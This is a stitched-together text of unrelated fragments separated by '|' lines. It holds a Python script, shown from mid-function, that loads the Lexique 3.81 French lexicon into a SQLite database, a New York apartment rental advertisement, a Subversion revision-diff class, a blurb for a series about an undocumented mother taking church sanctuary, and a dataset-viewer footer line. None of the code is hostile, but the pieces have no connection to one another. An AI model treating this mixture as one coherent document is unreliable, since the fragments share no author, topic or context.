    import pickle
    # Close the pickle file deterministically: the previous
    # pickle.load(open(...)) leaked the file handle.
    with open(number_name + '.pickle', 'rb') as pickle_file:
        numbers = pickle.load(pickle_file).get('français')
    with codecs.open(lex_name, 'r', 'utf-8') as f:
        f.readline()  # skip the header line
        for line in f:
            match = (0, "")
            fields = line.strip().split('\t')
            # Numeral adjectives, plus a few numeral nouns that are not
            # tagged ADJ:num.
            if fields[3] == "ADJ:num" or fields[0] in ["million",
                                                       "milliard", "zéro"]:
                # Keep the first matching number (same iteration order
                # as the original list comprehension).
                for number, props in numbers.items():
                    if (fields[0] == props.get('graphie')
                            and fields[1] == props.get('phonologie')):
                        match = (1, number)
                        break
            # The yielded fields come from the *unstripped* line, so the
            # last column keeps its trailing newline (as before).
            yield tuple(line.split("\t")) + match
def main():
    """Build Lexique.db: create the Lexique table and load every row
    produced by fonction() from Lexique381.txt.

    The table has 37 columns: the 35 Lexique 3.81 fields plus the two
    computed columns (isinteger, integer).  Fixed the 'STRNG' typo on
    the infover column declaration ('STRING', consistent with every
    other column).
    """
    import sqlite3
    rows = fonction("Lexique381.txt", "exceptions")
    with sqlite3.connect('Lexique.db') as conn:
        cursor = conn.cursor()
        cursor.execute("""CREATE TABLE Lexique (
        ortho STRING,
        phon STRING,
        lemme STRING,
        cgram STRING,
        genre STRING,
        nombre STRING,
        freqlemfilms2 STRING,
        freqlemlivres STRING,
        freqfilms2 STRING,
        freqlivres STRING,
        infover STRING,
        nbhomogr STRING,
        nbhomoph STRING,
        islem STRING,
        nblettres STRING,
        nbphons STRING,
        cvcv STRING,
        p STRING,
        voisorth STRING,
        voisphon STRING,
        puorth STRING,
        puphon STRING,
        syll STRING,
        nbsyll STRING,
        cv_cv STRING,
        orthrenv STRING,
        phonrenv STRING,
        orthosyll STRING,
        cgramortho STRING,
        deflem STRING,
        defobs STRING,
        old20 STRING,
        pld20 STRING,
        morphoder STRING,
        nbmorph STRING,
        isinteger STRING,
        integer STRING
        )""")
        # 37 placeholders, one per column above.
        cursor.executemany(
            '''INSERT INTO Lexique VALUES (
            ?,?,?,?,?,
            ?,?,?,?,?,
            ?,?,?,?,?,
            ?,?,?,?,?,
            ?,?,?,?,?,
            ?,?,?,?,?,
            ?,?,?,?,?,
            ?,?)''', rows)
        conn.commit()
def main2():
    """Print the first Lexique row whose orthography is 'vingt'
    (a quick sanity check against an existing Lexique.db)."""
    import sqlite3
    with sqlite3.connect("Lexique.db") as conn:
        row = conn.cursor().execute(
            "SELECT * FROM Lexique where ortho = ?", ("vingt",)).fetchone()
        print(row)
if __name__ == '__main__':
    # Only the quick lookup demo runs by default; run main() first to
    # (re)build Lexique.db.
    main2()
|
New York Squared has four beautiful studios available in Astoria, blocks away from the N/W train, and only recently constructed. The building is less than a year old and all utilities are included. The apartments also feature private outdoor space and a gorgeous rooftop with 360 degree views of all of New York. Impress your guests with a private party on the rooftop! Other amenities include private storage, gym and a laundry room. Private (indoor and outdoor) parking is available, but not included in the rent. These units are going for $1,800!!!
Loft in Downtown Philippe Starck Building Rented!!!
New York Squared recently rented a beautiful apartment in the renowned Financial District building 15 Broad Street, designed by the highly acclaimed Philippe Starck.
The sunny 700 square foot loft included an open kitchen, custom closets, a semi-enclosed bedroom and a built-in office.
The new resident will enjoy amenities including a Health Club, Swimming Pool, Sauna, Jacuzzi, Children’s Playroom, Yoga/Ballet Studio, Indoor Basketball Court, Squash Court, Business Center, Bowling Alley, Screening Room and open-air Floor Park.
Looking for something similar? Contact NY2 so we can assist you in finding your next home.
|
import os
from difflib import Differ
from pprint import pprint
from subvertpy import repos, ra, NODE_DIR, NODE_FILE
class RevisionDiff(object):
    """The set of changes needed to transform one revision into another.

    Wraps two revision objects and exposes ``value``: a difflib.Differ
    comparison of their resources' data, joined into one string.
    """
    def __init__(self, revision1=None, revision2=None):
        # NOTE(review): revision2 defaults to None but is dereferenced
        # immediately below -- callers presumably always pass both
        # revisions; confirm before relying on the defaults.
        super(RevisionDiff, self).__init__()
        self._rev1 = revision1
        self._rev2 = revision2
        self.ra_api = self._rev2.get_ra_api()
    def get_value(self):
        """Return a Differ (ndiff-style) comparison of the two
        revisions' resource data, concatenated into a single string.

        NOTE(review): Differ.compare() is handed two plain strings, so
        it diffs them character by character rather than line by line
        (and the result is not a unified diff) -- splitlines() was
        probably intended; confirm against callers.
        """
        # Revision ids are stashed on the instance; they are not used
        # within this method -- presumably read by callers. TODO confirm.
        self.rev1_num = self._rev1.properties.revision_id
        self.rev2_num = self._rev2.properties.revision_id
        resource1 = str(self._rev1.get_resource().data)
        resource2 = str(self._rev2.get_resource().data)
        differ = Differ()
        result = list(differ.compare(resource1, resource2))
        return ''.join(result)
    value = property(get_value)
|
For the undocumented mother of three, taking sanctuary in a church seemed the best way to keep her family together.
Read all of the episodes in the Finding Sanctuary series.
Cinthya Santos BrionesCinthya Santos Briones is a Mexican documentary photographer and photojournalist based in New York City.
Malav KanugaMalav Kanuga is an urban anthropologist and founding editor of Common Notions.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.